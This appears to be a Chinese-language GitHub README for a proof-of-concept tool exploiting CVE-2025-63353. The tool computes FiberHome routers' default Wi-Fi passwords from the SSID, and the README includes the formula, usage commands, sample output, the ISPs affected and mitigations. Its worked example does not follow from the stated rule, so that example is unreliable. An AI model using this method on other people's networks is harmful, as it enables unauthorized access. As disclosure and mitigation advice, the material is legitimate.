r0otk3r/CVE-2025-63353
GitHub: r0otk3r/CVE-2025-63353
这是一个基于 Python 的概念验证工具,用于利用 CVE-2025-63353 漏洞通过 SSID 推算 FiberHome 路由器的默认 Wi-Fi 密码。
Stars: 0 | Forks: 0
## FiberHome Wi-Fi 密码预测器 (CVE-2025-63353)
一款专为安全审计和概念验证设计的 Python 实用工具,用于演示 FiberHome HG6145F1 (RP4423) 路由器中发现的确定性密码生成缺陷。
## 📋 概述
该脚本利用了 CVE-2025-63353,这是一个关键漏洞,其出厂默认 WPA/WPA2 预共享密钥是根据广播的 SSID 通过数学推导得出的。通过观察网络名称 (SSID),攻击者无需任何用户交互即可计算出默认密码。
漏洞逻辑:
路由器使用一个确定性公式:HEX_A (来自 SSID) + HEX_B (来自密码) = 0xFFFFFF。
## 🌍 全球影响
FiberHome 设备在新兴市场的主要互联网服务提供商 (ISP) 中广泛部署。该脚本对具有以下默认命名约定的设备特别有效:
* 易受攻击的 SSID 格式:fh_XXXXXX (例如 fh_96C3A0)
* 易受攻击的密码格式:wlanxxxxxx
## 受影响地区和 ISP
* 阿尔及利亚:Algérie Télécom (Idoom Fibre)。
* 菲律宾:PLDT。
* 印度:BSNL 和 Airtel。
* 印度尼西亚:Telkom Indonesia。
## 🚀 使用方法
该脚本使用 argparse 来处理命令行输入。
## 基本命令
```
python predictor.py fh_96C3A0
```
### 输出示例:
```
[+] Predicted Password: wlan693c5f
```
## 详细模式
```
Use the -v flag to see the underlying hexadecimal subtraction.
```
```
python predictor.py fh_96C3A0 -v
```
### 输出示例:
```
[*] Input HEX_A: 0x669EA0
[*] Calculation: 0xFFFFFF - 0x669EA0 = 0x99615F
[+] Predicted Password: wlan693c5f
```
## 🛠️ 用户缓解措施
如果您的路由器受到影响,在采取行动之前您的网络是不安全的:
1. 更改您的 Wi-Fi 密码:不要使用出厂默认设置。
2. 禁用 WPS:这可以减少类似基于凭据的攻击面。
3. 使用第三方路由器:将您自己的路由器连接到 FiberHome ONT,并完全禁用 FiberHome Wi-Fi。
## ⚠️ 法律免责声明
此信息仅供授权的安全测试、网络管理和教育目的使用。
标签:Airtel, Algérie Télécom, BSNL, CVE-2025-63353, FiberHome, HG6145F1, IoT安全, PLDT, SSID分析, Telkom Indonesia, WPA2, 密码预测, 概念验证, 电信设备, 确定性算法, 路由器安全, 逆向工具, 预共享密钥, 默认密码